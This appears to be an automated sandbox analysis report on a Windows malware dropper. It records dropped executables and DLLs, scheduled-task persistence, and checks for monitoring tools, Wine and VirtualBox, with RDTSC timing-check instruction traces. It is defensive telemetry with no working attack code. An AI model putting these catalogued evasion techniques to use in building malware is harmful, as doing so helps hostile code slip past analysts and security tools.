Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.985769565429945
Source: amadka[1].exe.0.dr Static PE information: section name: aosuufqe entropy: 7.952514674538918
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: entropy: 7.985769565429945
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: aosuufqe entropy: 7.952514674538918
Source: explorti.exe.7.dr Static PE information: section name: entropy: 7.985769565429945
Source: explorti.exe.7.dr Static PE information: section name: aosuufqe entropy: 7.952514674538918
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.995194725278902
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.976101280157095
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.948506104133843
Source: 0244247334.exe.13.dr Static PE information: section name: entropy: 7.995194725278902
Source: 0244247334.exe.13.dr Static PE information: section name: entropy: 7.976101280157095
Source: 0244247334.exe.13.dr Static PE information: section name: entropy: 7.948506104133843
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5B55F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55FEAB second address: 55FEBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F12E0FAFC7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 548303 second address: 548313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDBCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55EFE5 second address: 55EFF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F12E0FAFC7Bh 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2A3 second address: 55F2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2A9 second address: 55F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2B2 second address: 55F2B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2B8 second address: 55F2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2BC second address: 55F2C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F426 second address: 55F42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F42B second address: 55F432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F432 second address: 55F43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5633B7 second address: 5633E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F12E108FDC8h 0x00000008 jg 00007F12E108FDB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5633E0 second address: 563454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F12E0FAFC76h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F12E0FAFC84h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ebx 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e pop ebx 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jng 00007F12E0FAFC84h 0x00000028 jmp 00007F12E0FAFC7Eh 0x0000002d push eax 0x0000002e jmp 00007F12E0FAFC87h 0x00000033 pop eax 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F12E0FAFC7Eh 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 563583 second address: 563589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 563589 second address: 56358D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 56385B second address: 563865 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 57528A second address: 57528E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 57528E second address: 57529A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5834D4 second address: 5834D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5834D8 second address: 5834EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58189C second address: 5818A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5818A7 second address: 5818B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F12E108FDB6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5818B4 second address: 5818C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F12E0FAFC76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5818C0 second address: 5818E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBFh 0x00000007 jng 00007F12E108FDB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58222B second address: 58222F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58222F second address: 582233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582233 second address: 582255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F12E0FAFC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F12E0FAFC82h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582255 second address: 58227E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F12E108FDC6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582437 second address: 582448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F12E0FAFC78h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582448 second address: 582454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F12E108FDB6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582454 second address: 58246D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F12E0FAFC7Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 57689A second address: 5768A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 553DE6 second address: 553E0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12E0FAFC85h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 553E0F second address: 553E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582B67 second address: 582B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582B6B second address: 582B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC6h 0x00000007 jmp 00007F12E108FDC1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F12E108FDC2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582B9E second address: 582BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582BA4 second address: 582BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jg 00007F12E108FDB6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582BB5 second address: 582BC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F12E0FAFC7Ah 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582BC7 second address: 582BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F12E108FDB6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582D3B second address: 582D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 583018 second address: 583036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F12E108FDC7h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 583036 second address: 583064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC80h 0x00000007 push edx 0x00000008 jno 00007F12E0FAFC76h 0x0000000e jg 00007F12E0FAFC76h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F12E0FAFC76h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 583064 second address: 583068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 583068 second address: 58306E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5863D0 second address: 5863E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jno 00007F12E108FDB6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5863E4 second address: 5863F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F12E0FAFC76h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 589283 second address: 589290 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F12E108FDB8h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C4FA second address: 58C50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC7Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C50D second address: 58C520 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C520 second address: 58C52A instructions: 0x00000000 rdtsc 0x00000002 je 00007F12E0FAFC7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C52A second address: 58C546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12E108FDC0h 0x00000011 rdtsc
